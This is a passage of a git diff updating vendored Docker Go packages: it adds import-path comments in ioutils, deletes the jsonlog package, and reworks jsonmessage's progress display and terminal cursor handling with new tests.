context.WithTimeout(context.Background(), 100*time.Millisecond) + ctx, cancel := context.WithTimeout(context.Background(), 100*time.Millisecond) + defer cancel() cancelReadCloser := NewCancelReadCloser(ctx, ioutil.NopCloser(&perpetualReader{})) for { var buf [128]byte diff --git a/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go b/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go index 1539ad21b5..dc894f9131 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go @@ -1,6 +1,6 @@ // +build !windows -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import "io/ioutil" diff --git a/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go b/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go index c258e5fdd8..ecaba2e36d 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go b/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go index 52a4901ade..91b8d18266 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go @@ -1,4 +1,4 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/ioutils/writers.go b/vendor/github.com/docker/docker/pkg/ioutils/writers.go index ccc7f9c23e..61c679497d 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/writers.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/writers.go @@ -1,4 +1,4 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import "io" diff --git a/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go b/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go index 564b1cd4f5..94d446f9a9 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go @@ -1,4 +1,4 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( "bytes" diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go deleted file mode 100644 index 4734c31119..0000000000 --- a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go +++ /dev/null @@ -1,42 +0,0 @@ -package jsonlog - -import ( - "encoding/json" - "fmt" - "time" -) - -// JSONLog represents a log message, typically a single entry from a given log stream. -// JSONLogs can be easily serialized to and from JSON and support custom formatting. -type JSONLog struct { - // Log is the log message - Log string `json:"log,omitempty"` - // Stream is the log source - Stream string `json:"stream,omitempty"` - // Created is the created timestamp of log - Created time.Time `json:"time"` - // Attrs is the list of extra attributes provided by the user - Attrs map[string]string `json:"attrs,omitempty"` -} - -// Format returns the log formatted according to format -// If format is nil, returns the log message -// If format is json, returns the log marshaled in json format -// By default, returns the log with the log time formatted according to format. -func (jl *JSONLog) Format(format string) (string, error) { - if format == "" { - return jl.Log, nil - } - if format == "json" { - m, err := json.Marshal(jl) - return string(m), err - } - return fmt.Sprintf("%s %s", jl.Created.Format(format), jl.Log), nil -} - -// Reset resets the log to nil. -func (jl *JSONLog) Reset() { - jl.Log = "" - jl.Stream = "" - jl.Created = time.Time{} -} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go deleted file mode 100644 index 83ce684a8e..0000000000 --- a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go +++ /dev/null @@ -1,178 +0,0 @@ -// This code was initially generated by ffjson -// This code was generated via the following steps: -// $ go get -u github.com/pquerna/ffjson -// $ make BIND_DIR=. shell -// $ ffjson pkg/jsonlog/jsonlog.go -// $ mv pkg/jsonglog/jsonlog_ffjson.go pkg/jsonlog/jsonlog_marshalling.go -// -// It has been modified to improve the performance of time marshalling to JSON -// and to clean it up. -// Should this code need to be regenerated when the JSONLog struct is changed, -// the relevant changes which have been made are: -// import ( -// "bytes" -//- -// "unicode/utf8" -// ) -// -// func (mj *JSONLog) MarshalJSON() ([]byte, error) { -//@@ -20,13 +16,13 @@ func (mj *JSONLog) MarshalJSON() ([]byte, error) { -// } -// return buf.Bytes(), nil -// } -//+ -// func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error { -//- var err error -//- var obj []byte -//- var first bool = true -//- _ = obj -//- _ = err -//- _ = first -//+ var ( -//+ err error -//+ timestamp string -//+ first bool = true -//+ ) -// buf.WriteString(`{`) -// if len(mj.Log) != 0 { -// if first == true { -//@@ -52,11 +48,11 @@ func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error { -// buf.WriteString(`,`) -// } -// buf.WriteString(`"time":`) -//- obj, err = mj.Created.MarshalJSON() -//+ timestamp, err = FastTimeMarshalJSON(mj.Created) -// if err != nil { -// return err -// } -//- buf.Write(obj) -//+ buf.WriteString(timestamp) -// buf.WriteString(`}`) -// return nil -// } -// @@ -81,9 +81,10 @@ func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error { -// if len(mj.Log) != 0 { -// - if first == true { -// - first = false -// - } else { -// - buf.WriteString(`,`) -// - } -// + first = false -// buf.WriteString(`"log":`) -// ffjsonWriteJSONString(buf, mj.Log) -// } - -package jsonlog - -import ( - "bytes" - "unicode/utf8" -) - -// MarshalJSON marshals the JSONLog. -func (mj *JSONLog) MarshalJSON() ([]byte, error) { - var buf bytes.Buffer - buf.Grow(1024) - if err := mj.MarshalJSONBuf(&buf); err != nil { - return nil, err - } - return buf.Bytes(), nil -} - -// MarshalJSONBuf marshals the JSONLog and stores the result to a bytes.Buffer. -func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error { - var ( - err error - timestamp string - first = true - ) - buf.WriteString(`{`) - if len(mj.Log) != 0 { - first = false - buf.WriteString(`"log":`) - ffjsonWriteJSONString(buf, mj.Log) - } - if len(mj.Stream) != 0 { - if first { - first = false - } else { - buf.WriteString(`,`) - } - buf.WriteString(`"stream":`) - ffjsonWriteJSONString(buf, mj.Stream) - } - if !first { - buf.WriteString(`,`) - } - buf.WriteString(`"time":`) - timestamp, err = FastTimeMarshalJSON(mj.Created) - if err != nil { - return err - } - buf.WriteString(timestamp) - buf.WriteString(`}`) - return nil -} - -func ffjsonWriteJSONString(buf *bytes.Buffer, s string) { - const hex = "0123456789abcdef" - - buf.WriteByte('"') - start := 0 - for i := 0; i < len(s); { - if b := s[i]; b < utf8.RuneSelf { - if 0x20 <= b && b != '\\' && b != '"' && b != '<' && b != '>' && b != '&' { - i++ - continue - } - if start < i { - buf.WriteString(s[start:i]) - } - switch b { - case '\\', '"': - buf.WriteByte('\\') - buf.WriteByte(b) - case '\n': - buf.WriteByte('\\') - buf.WriteByte('n') - case '\r': - buf.WriteByte('\\') - buf.WriteByte('r') - default: - - buf.WriteString(`\u00`) - buf.WriteByte(hex[b>>4]) - buf.WriteByte(hex[b&0xF]) - } - i++ - start = i - continue - } - c, size := utf8.DecodeRuneInString(s[i:]) - if c == utf8.RuneError && size == 1 { - if start < i { - buf.WriteString(s[start:i]) - } - buf.WriteString(`\ufffd`) - i += size - start = i - continue - } - - if c == '\u2028' || c == '\u2029' { - if start < i { - buf.WriteString(s[start:i]) - } - buf.WriteString(`\u202`) - buf.WriteByte(hex[c&0xF]) - i += size - start = i - continue - } - i += size - } - if start < len(s) { - buf.WriteString(s[start:]) - } - buf.WriteByte('"') -} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go deleted file mode 100644 index 3edb271410..0000000000 --- a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go +++ /dev/null @@ -1,34 +0,0 @@ -package jsonlog - -import ( - "regexp" - "testing" -) - -func TestJSONLogMarshalJSON(t *testing.T) { - logs := map[*JSONLog]string{ - &JSONLog{Log: `"A log line with \\"`}: `^{\"log\":\"\\\"A log line with \\\\\\\\\\\"\",\"time\":\".{20,}\"}$`, - &JSONLog{Log: "A log line"}: `^{\"log\":\"A log line\",\"time\":\".{20,}\"}$`, - &JSONLog{Log: "A log line with \r"}: `^{\"log\":\"A log line with \\r\",\"time\":\".{20,}\"}$`, - &JSONLog{Log: "A log line with & < >"}: `^{\"log\":\"A log line with \\u0026 \\u003c \\u003e\",\"time\":\".{20,}\"}$`, - &JSONLog{Log: "A log line with utf8 : 🚀 ψ ω β"}: `^{\"log\":\"A log line with utf8 : 🚀 ψ ω β\",\"time\":\".{20,}\"}$`, - &JSONLog{Stream: "stdout"}: `^{\"stream\":\"stdout\",\"time\":\".{20,}\"}$`, - &JSONLog{}: `^{\"time\":\".{20,}\"}$`, - // These ones are a little weird - &JSONLog{Log: "\u2028 \u2029"}: `^{\"log\":\"\\u2028 \\u2029\",\"time\":\".{20,}\"}$`, - &JSONLog{Log: string([]byte{0xaF})}: `^{\"log\":\"\\ufffd\",\"time\":\".{20,}\"}$`, - &JSONLog{Log: string([]byte{0x7F})}: `^{\"log\":\"\x7f\",\"time\":\".{20,}\"}$`, - } - for jsonLog, expression := range logs { - data, err := jsonLog.MarshalJSON() - if err != nil { - t.Fatal(err) - } - res := string(data) - t.Logf("Result of WriteLog: %q", res) - logRe := regexp.MustCompile(expression) - if !logRe.MatchString(res) { - t.Fatalf("Log line not in expected format [%v]: %q", expression, res) - } - } -} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go deleted file mode 100644 index 6d6ad21583..0000000000 --- a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go +++ /dev/null @@ -1,39 +0,0 @@ -package jsonlog - -import ( - "bytes" - "regexp" - "testing" -) - -func TestJSONLogsMarshalJSONBuf(t *testing.T) { - logs := map[*JSONLogs]string{ - &JSONLogs{Log: []byte(`"A log line with \\"`)}: `^{\"log\":\"\\\"A log line with \\\\\\\\\\\"\",\"time\":}$`, - &JSONLogs{Log: []byte("A log line")}: `^{\"log\":\"A log line\",\"time\":}$`, - &JSONLogs{Log: []byte("A log line with \r")}: `^{\"log\":\"A log line with \\r\",\"time\":}$`, - &JSONLogs{Log: []byte("A log line with & < >")}: `^{\"log\":\"A log line with \\u0026 \\u003c \\u003e\",\"time\":}$`, - &JSONLogs{Log: []byte("A log line with utf8 : 🚀 ψ ω β")}: `^{\"log\":\"A log line with utf8 : 🚀 ψ ω β\",\"time\":}$`, - &JSONLogs{Stream: "stdout"}: `^{\"stream\":\"stdout\",\"time\":}$`, - &JSONLogs{Stream: "stdout", Log: []byte("A log line")}: `^{\"log\":\"A log line\",\"stream\":\"stdout\",\"time\":}$`, - &JSONLogs{Created: "time"}: `^{\"time\":time}$`, - &JSONLogs{}: `^{\"time\":}$`, - // These ones are a little weird - &JSONLogs{Log: []byte("\u2028 \u2029")}: `^{\"log\":\"\\u2028 \\u2029\",\"time\":}$`, - &JSONLogs{Log: []byte{0xaF}}: `^{\"log\":\"\\ufffd\",\"time\":}$`, - &JSONLogs{Log: []byte{0x7F}}: `^{\"log\":\"\x7f\",\"time\":}$`, - // with raw attributes - &JSONLogs{Log: []byte("A log line"), RawAttrs: []byte(`{"hello":"world","value":1234}`)}: `^{\"log\":\"A log line\",\"attrs\":{\"hello\":\"world\",\"value\":1234},\"time\":}$`, - } - for jsonLog, expression := range logs { - var buf bytes.Buffer - if err := jsonLog.MarshalJSONBuf(&buf); err != nil { - t.Fatal(err) - } - res := buf.String() - t.Logf("Result of WriteLog: %q", res) - logRe := regexp.MustCompile(expression) - if !logRe.MatchString(res) { - t.Fatalf("Log line not in expected format [%v]: %q", expression, res) - } - } -} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go b/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go deleted file mode 100644 index 2117338149..0000000000 --- a/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go +++ /dev/null @@ -1,27 +0,0 @@ -// Package jsonlog provides helper functions to parse and print time (time.Time) as JSON. -package jsonlog - -import ( - "errors" - "time" -) - -const ( - // RFC3339NanoFixed is our own version of RFC339Nano because we want one - // that pads the nano seconds part with zeros to ensure - // the timestamps are aligned in the logs. - RFC3339NanoFixed = "2006-01-02T15:04:05.000000000Z07:00" - // JSONFormat is the format used by FastMarshalJSON - JSONFormat = `"` + time.RFC3339Nano + `"` -) - -// FastTimeMarshalJSON avoids one of the extra allocations that -// time.MarshalJSON is making. -func FastTimeMarshalJSON(t time.Time) (string, error) { - if y := t.Year(); y < 0 || y >= 10000 { - // RFC 3339 is clear that years are 4 digits exactly. - // See golang.org/issue/4556#c15 for more discussion. - return "", errors.New("time.MarshalJSON: year outside of range [0,9999]") - } - return t.Format(JSONFormat), nil -} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go b/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go deleted file mode 100644 index 02d0302c4a..0000000000 --- a/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go +++ /dev/null @@ -1,47 +0,0 @@ -package jsonlog - -import ( - "testing" - "time" -) - -// Testing to ensure 'year' fields is between 0 and 9999 -func TestFastTimeMarshalJSONWithInvalidDate(t *testing.T) { - aTime := time.Date(-1, 1, 1, 0, 0, 0, 0, time.Local) - json, err := FastTimeMarshalJSON(aTime) - if err == nil { - t.Fatalf("FastTimeMarshalJSON should throw an error, but was '%v'", json) - } - anotherTime := time.Date(10000, 1, 1, 0, 0, 0, 0, time.Local) - json, err = FastTimeMarshalJSON(anotherTime) - if err == nil { - t.Fatalf("FastTimeMarshalJSON should throw an error, but was '%v'", json) - } - -} - -func TestFastTimeMarshalJSON(t *testing.T) { - aTime := time.Date(2015, 5, 29, 11, 1, 2, 3, time.UTC) - json, err := FastTimeMarshalJSON(aTime) - if err != nil { - t.Fatal(err) - } - expected := "\"2015-05-29T11:01:02.000000003Z\"" - if json != expected { - t.Fatalf("Expected %v, got %v", expected, json) - } - - location, err := time.LoadLocation("Europe/Paris") - if err != nil { - t.Fatal(err) - } - aTime = time.Date(2015, 5, 29, 11, 1, 2, 3, location) - json, err = FastTimeMarshalJSON(aTime) - if err != nil { - t.Fatal(err) - } - expected = "\"2015-05-29T11:01:02.000000003+02:00\"" - if json != expected { - t.Fatalf("Expected %v, got %v", expected, json) - } -} diff --git a/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go index 5481433c56..dd95f36704 100644 --- a/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go +++ b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go @@ -1,17 +1,22 @@ -package jsonmessage +package jsonmessage // import "github.com/docker/docker/pkg/jsonmessage" import ( "encoding/json" "fmt" "io" + "os" "strings" "time" - "github.com/docker/docker/pkg/jsonlog" + "github.com/Nvveen/Gotty" "github.com/docker/docker/pkg/term" "github.com/docker/go-units" ) +// RFC3339NanoFixed is time.RFC3339Nano with nanoseconds padded using zeros to +// ensure the formatted time isalways the same number of characters. +const RFC3339NanoFixed = "2006-01-02T15:04:05.000000000Z07:00" + // JSONError wraps a concrete Code and Message, `Code` is // is an integer error code, `Message` is the error message. type JSONError struct { @@ -32,29 +37,33 @@ type JSONProgress struct { Current int64 `json:"current,omitempty"` Total int64 `json:"total,omitempty"` Start int64 `json:"start,omitempty"` + // If true, don't show xB/yB + HideCounts bool `json:"hidecounts,omitempty"` + Units string `json:"units,omitempty"` + nowFunc func() time.Time + winSize int } func (p *JSONProgress) String() string { var ( - width = 200 + width = p.width() pbBox string numbersBox string timeLeftBox string ) - - ws, err := term.GetWinsize(p.terminalFd) - if err == nil { - width = int(ws.Width) - } - if p.Current <= 0 && p.Total <= 0 { return "" } - current := units.HumanSize(float64(p.Current)) if p.Total <= 0 { - return fmt.Sprintf("%8v", current) + switch p.Units { + case "": + current := units.HumanSize(float64(p.Current)) + return fmt.Sprintf("%8v", current) + default: + return fmt.Sprintf("%d %s", p.Current, p.Units) + } } - total := units.HumanSize(float64(p.Total)) + percentage := int(float64(p.Current)/float64(p.Total)*100) / 2 if percentage > 50 { percentage = 50 @@ -68,15 +77,29 @@ func (p *JSONProgress) String() string { pbBox = fmt.Sprintf("[%s>%s] ", strings.Repeat("=", percentage), strings.Repeat(" ", numSpaces)) } - numbersBox = fmt.Sprintf("%8v/%v", current, total) + switch { + case p.HideCounts: + case p.Units == "": // no units, use bytes + current := units.HumanSize(float64(p.Current)) + total := units.HumanSize(float64(p.Total)) + + numbersBox = fmt.Sprintf("%8v/%v", current, total) + + if p.Current > p.Total { + // remove total display if the reported current is wonky. + numbersBox = fmt.Sprintf("%8v", current) + } + default: + numbersBox = fmt.Sprintf("%d/%d %s", p.Current, p.Total, p.Units) - if p.Current > p.Total { - // remove total display if the reported current is wonky. - numbersBox = fmt.Sprintf("%8v", current) + if p.Current > p.Total { + // remove total display if the reported current is wonky. + numbersBox = fmt.Sprintf("%d %s", p.Current, p.Units) + } } if p.Current > 0 && p.Start > 0 && percentage < 50 { - fromStart := time.Now().UTC().Sub(time.Unix(p.Start, 0)) + fromStart := p.now().Sub(time.Unix(p.Start, 0)) perEntry := fromStart / time.Duration(p.Current) left := time.Duration(p.Total-p.Current) * perEntry left = (left / time.Second) * time.Second @@ -88,6 +111,28 @@ func (p *JSONProgress) String() string { return pbBox + numbersBox + timeLeftBox } +// shim for testing +func (p *JSONProgress) now() time.Time { + if p.nowFunc == nil { + p.nowFunc = func() time.Time { + return time.Now().UTC() + } + } + return p.nowFunc() +} + +// shim for testing +func (p *JSONProgress) width() int { + if p.winSize != 0 { + return p.winSize + } + ws, err := term.GetWinsize(p.terminalFd) + if err == nil { + return int(ws.Width) + } + return 200 +} + // JSONMessage defines a message struct. It describes // the created time, where it from, status, ID of the // message. It's used for docker events. @@ -102,32 +147,82 @@ type JSONMessage struct { TimeNano int64 `json:"timeNano,omitempty"` Error *JSONError `json:"errorDetail,omitempty"` ErrorMessage string `json:"error,omitempty"` //deprecated - // Aux contains out-of-band data, such as digests for push signing. + // Aux contains out-of-band data, such as digests for push signing and image id after building. Aux *json.RawMessage `json:"aux,omitempty"` } -// Display displays the JSONMessage to `out`. `isTerminal` describes if `out` +/* Satisfied by gotty.TermInfo as well as noTermInfo from below */ +type termInfo interface { + Parse(attr string, params ...interface{}) (string, error) +} + +type noTermInfo struct{} // canary used when no terminfo. + +func (ti *noTermInfo) Parse(attr string, params ...interface{}) (string, error) { + return "", fmt.Errorf("noTermInfo") +} + +func clearLine(out io.Writer, ti termInfo) { + // el2 (clear whole line) is not exposed by terminfo. + + // First clear line from beginning to cursor + if attr, err := ti.Parse("el1"); err == nil { + fmt.Fprintf(out, "%s", attr) + } else { + fmt.Fprintf(out, "\x1b[1K") + } + // Then clear line from cursor to end + if attr, err := ti.Parse("el"); err == nil { + fmt.Fprintf(out, "%s", attr) + } else { + fmt.Fprintf(out, "\x1b[K") + } +} + +func cursorUp(out io.Writer, ti termInfo, l int) { + if l == 0 { // Should never be the case, but be tolerant + return + } + if attr, err := ti.Parse("cuu", l); err == nil { + fmt.Fprintf(out, "%s", attr) + } else { + fmt.Fprintf(out, "\x1b[%dA", l) + } +} + +func cursorDown(out io.Writer, ti termInfo, l int) { + if l == 0 { // Should never be the case, but be tolerant + return + } + if attr, err := ti.Parse("cud", l); err == nil { + fmt.Fprintf(out, "%s", attr) + } else { + fmt.Fprintf(out, "\x1b[%dB", l) + } +} + +// Display displays the JSONMessage to `out`. `termInfo` is non-nil if `out` // is a terminal. If this is the case, it will erase the entire current line // when displaying the progressbar. -func (jm *JSONMessage) Display(out io.Writer, isTerminal bool) error { +func (jm *JSONMessage) Display(out io.Writer, termInfo termInfo) error { if jm.Error != nil { if jm.Error.Code == 401 { - return fmt.Errorf("Authentication is required.") + return fmt.Errorf("authentication is required") } return jm.Error } var endl string - if isTerminal && jm.Stream == "" && jm.Progress != nil { - // [2K = erase entire current line - fmt.Fprintf(out, "%c[2K\r", 27) + if termInfo != nil && jm.Stream == "" && jm.Progress != nil { + clearLine(out, termInfo) endl = "\r" + fmt.Fprintf(out, endl) } else if jm.Progress != nil && jm.Progress.String() != "" { //disable progressbar in non-terminal return nil } if jm.TimeNano != 0 { - fmt.Fprintf(out, "%s ", time.Unix(0, jm.TimeNano).Format(jsonlog.RFC3339NanoFixed)) + fmt.Fprintf(out, "%s ", time.Unix(0, jm.TimeNano).Format(RFC3339NanoFixed)) } else if jm.Time != 0 { - fmt.Fprintf(out, "%s ", time.Unix(jm.Time, 0).Format(jsonlog.RFC3339NanoFixed)) + fmt.Fprintf(out, "%s ", time.Unix(jm.Time, 0).Format(RFC3339NanoFixed)) } if jm.ID != "" { fmt.Fprintf(out, "%s: ", jm.ID) @@ -135,7 +230,7 @@ func (jm *JSONMessage) Display(out io.Writer, isTerminal bool) error { if jm.From != "" { fmt.Fprintf(out, "(from %s) ", jm.From) } - if jm.Progress != nil && isTerminal { + if jm.Progress != nil && termInfo != nil { fmt.Fprintf(out, "%s %s%s", jm.Status, jm.Progress.String(), endl) } else if jm.ProgressMessage != "" { //deprecated fmt.Fprintf(out, "%s %s%s", jm.Status, jm.ProgressMessage, endl) @@ -150,11 +245,26 @@ func (jm *JSONMessage) Display(out io.Writer, isTerminal bool) error { // DisplayJSONMessagesStream displays a json message stream from `in` to `out`, `isTerminal` // describes if `out` is a terminal. If this is the case, it will print `\n` at the end of // each line and move the cursor while displaying. -func DisplayJSONMessagesStream(in io.Reader, out io.Writer, terminalFd uintptr, isTerminal bool, auxCallback func(*json.RawMessage)) error { +func DisplayJSONMessagesStream(in io.Reader, out io.Writer, terminalFd uintptr, isTerminal bool, auxCallback func(JSONMessage)) error { var ( dec = json.NewDecoder(in) ids = make(map[string]int) ) + + var termInfo termInfo + + if isTerminal { + term := os.Getenv("TERM") + if term == "" { + term = "vt102" + } + + var err error + if termInfo, err = gotty.OpenTermInfo(term); err != nil { + termInfo = &noTermInfo{} + } + } + for { diff := 0 var jm JSONMessage @@ -167,7 +277,7 @@ func DisplayJSONMessagesStream(in io.Reader, out io.Writer, terminalFd uintptr, if jm.Aux != nil { if auxCallback != nil { - auxCallback(jm.Aux) + auxCallback(jm) } continue } @@ -186,13 +296,13 @@ func DisplayJSONMessagesStream(in io.Reader, out io.Writer, terminalFd uintptr, // with no ID. line = len(ids) ids[jm.ID] = line - if isTerminal { + if termInfo != nil { fmt.Fprintf(out, "\n") } } diff = len(ids) - line - if isTerminal && diff > 0 { - fmt.Fprintf(out, "%c[%dA", 27, diff) + if termInfo != nil { + cursorUp(out, termInfo, diff) } } else { // When outputting something that isn't progress @@ -202,9 +312,9 @@ func DisplayJSONMessagesStream(in io.Reader, out io.Writer, terminalFd uintptr, // with multiple tags). ids = make(map[string]int) } - err := jm.Display(out, isTerminal) - if jm.ID != "" && isTerminal && diff > 0 { - fmt.Fprintf(out, "%c[%dB", 27, diff) + err := jm.Display(out, termInfo) + if jm.ID != "" && termInfo != nil { + cursorDown(out, termInfo, diff) } if err != nil { return err @@ -220,6 +330,6 @@ type stream interface { } // DisplayJSONMessagesToStream prints json messages to the output stream -func DisplayJSONMessagesToStream(in io.Reader, stream stream, auxCallback func(*json.RawMessage)) error { +func DisplayJSONMessagesToStream(in io.Reader, stream stream, auxCallback func(JSONMessage)) error { return DisplayJSONMessagesStream(in, stream, stream.FD(), stream.IsTerminal(), auxCallback) } diff --git a/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go index c6c5b0ed2a..223d9c7f5a 100644 --- a/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go +++ b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go @@ -1,68 +1,116 @@ -package jsonmessage +package jsonmessage // import "github.com/docker/docker/pkg/jsonmessage" import ( "bytes" "fmt" + "os" "strings" "testing" "time" - "github.com/docker/docker/pkg/jsonlog" "github.com/docker/docker/pkg/term" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestError(t *testing.T) { je := JSONError{404, "Not found"} - if je.Error() != "Not found" { - t.Fatalf("Expected 'Not found' got '%s'", je.Error()) - } + assert.Assert(t, is.Error(&je, "Not found")) } -func TestProgress(t *testing.T) { - termsz, err := term.GetWinsize(0) - if err != nil { - // we can safely ignore the err here - termsz = nil - } - jp := JSONProgress{} - if jp.String() != "" { - t.Fatalf("Expected empty string, got '%s'", jp.String()) +func TestProgressString(t *testing.T) { + type expected struct { + short string + long string } - expected := " 1 B" - jp2 := JSONProgress{Current: 1} - if jp2.String() != expected { - t.Fatalf("Expected %q, got %q", expected, jp2.String()) + shortAndLong := func(short, long string) expected { + return expected{short: short, long: long} } - expectedStart := "[==========> ] 20 B/100 B" - if termsz != nil && termsz.Width <= 110 { - expectedStart = " 20 B/100 B" - } - jp3 := JSONProgress{Current: 20, Total: 100, Start: time.Now().Unix()} - // Just look at the start of the string - // (the remaining time is really hard to test -_-) - if jp3.String()[:len(expectedStart)] != expectedStart { - t.Fatalf("Expected to start with %q, got %q", expectedStart, jp3.String()) + start := time.Date(2017, 12, 3, 15, 10, 1, 0, time.UTC) + timeAfter := func(delta time.Duration) func() time.Time { + return func() time.Time { + return start.Add(delta) + } } - expected = "[=========================> ] 50 B/100 B" - if termsz != nil && termsz.Width <= 110 { - expected = " 50 B/100 B" - } - jp4 := JSONProgress{Current: 50, Total: 100} - if jp4.String() != expected { - t.Fatalf("Expected %q, got %q", expected, jp4.String()) + var testcases = []struct { + name string + progress JSONProgress + expected expected + }{ + { + name: "no progress", + }, + { + name: "progress 1", + progress: JSONProgress{Current: 1}, + expected: shortAndLong(" 1B", " 1B"), + }, + { + name: "some progress with a start time", + progress: JSONProgress{ + Current: 20, + Total: 100, + Start: start.Unix(), + nowFunc: timeAfter(time.Second), + }, + expected: shortAndLong( + " 20B/100B 4s", + "[==========> ] 20B/100B 4s", + ), + }, + { + name: "some progress without a start time", + progress: JSONProgress{Current: 50, Total: 100}, + expected: shortAndLong( + " 50B/100B", + "[=========================> ] 50B/100B", + ), + }, + { + name: "current more than total is not negative gh#7136", + progress: JSONProgress{Current: 50, Total: 40}, + expected: shortAndLong( + " 50B", + "[==================================================>] 50B", + ), + }, + { + name: "with units", + progress: JSONProgress{Current: 50, Total: 100, Units: "units"}, + expected: shortAndLong( + "50/100 units", + "[=========================> ] 50/100 units", + ), + }, + { + name: "current more than total with units is not negative ", + progress: JSONProgress{Current: 50, Total: 40, Units: "units"}, + expected: shortAndLong( + "50 units", + "[==================================================>] 50 units", + ), + }, + { + name: "hide counts", + progress: JSONProgress{Current: 50, Total: 100, HideCounts: true}, + expected: shortAndLong( + "", + "[=========================> ] ", + ), + }, } - // this number can't be negative gh#7136 - expected = "[==================================================>] 50 B" - if termsz != nil && termsz.Width <= 110 { - expected = " 50 B" - } - jp5 := JSONProgress{Current: 50, Total: 40} - if jp5.String() != expected { - t.Fatalf("Expected %q, got %q", expected, jp5.String()) + for _, testcase := range testcases { + t.Run(testcase.name, func(t *testing.T) { + testcase.progress.winSize = 100 + assert.Equal(t, testcase.progress.String(), testcase.expected.short) + + testcase.progress.winSize = 200 + assert.Equal(t, testcase.progress.String(), testcase.expected.long) + }) } } @@ -70,47 +118,47 @@ func TestJSONMessageDisplay(t *testing.T) { now := time.Now() messages := map[JSONMessage][]string{ // Empty - JSONMessage{}: {"\n", "\n"}, + {}: {"\n", "\n"}, // Status - JSONMessage{ + { Status: "status", }: { "status\n", "status\n", }, // General - JSONMessage{ + { Time: now.Unix(), ID: "ID", From: "From", Status: "status", }: { - fmt.Sprintf("%v ID: (from From) status\n", time.Unix(now.Unix(), 0).Format(jsonlog.RFC3339NanoFixed)), - fmt.Sprintf("%v ID: (from From) status\n", time.Unix(now.Unix(), 0).Format(jsonlog.RFC3339NanoFixed)), + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(now.Unix(), 0).Format(RFC3339NanoFixed)), + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(now.Unix(), 0).Format(RFC3339NanoFixed)), }, // General, with nano precision time - JSONMessage{ + { TimeNano: now.UnixNano(), ID: "ID", From: "From", Status: "status", }: { - fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)), - fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)), + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(RFC3339NanoFixed)), + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(RFC3339NanoFixed)), }, // General, with both times Nano is preferred - JSONMessage{ + { Time: now.Unix(), TimeNano: now.UnixNano(), ID: "ID", From: "From", Status: "status", }: { - fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)), - fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)), + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, 